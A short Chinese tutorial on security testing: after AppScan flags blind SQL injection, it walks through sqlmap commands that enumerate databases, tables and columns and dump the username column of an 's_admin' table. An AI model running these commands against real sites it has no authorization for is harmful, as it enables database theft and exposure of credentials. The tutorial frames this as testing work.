做安全测试时，先用appscan扫描目标网站，爆出sql盲注的风险

 然后使用sqlmap专业工具来扫描分析漏洞

GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolAutomatic SQL injection and database takeover tool - GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolhttps://github.com/sqlmapproject/sqlmap把上图所示部分（请求行+请求头+请求体）存储为test.txt，放到与sqlmap.py同路径下

• 查看所有数据库

python sqlmap.py -r E:\sqlmap-master\test.txt --dbs 

 

结果中有parameter说明确实有漏洞

所有数据库信息

• 查看指定数据库的所有表信息

python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn --tables 

 

• 查看指定数据库，表的所有列信息

python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin --columns

 

• 查看指定数据库，表，列的信息

python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin -C username --dump

 

太可怕了，数据库数据暴漏了，网络安全人人有责！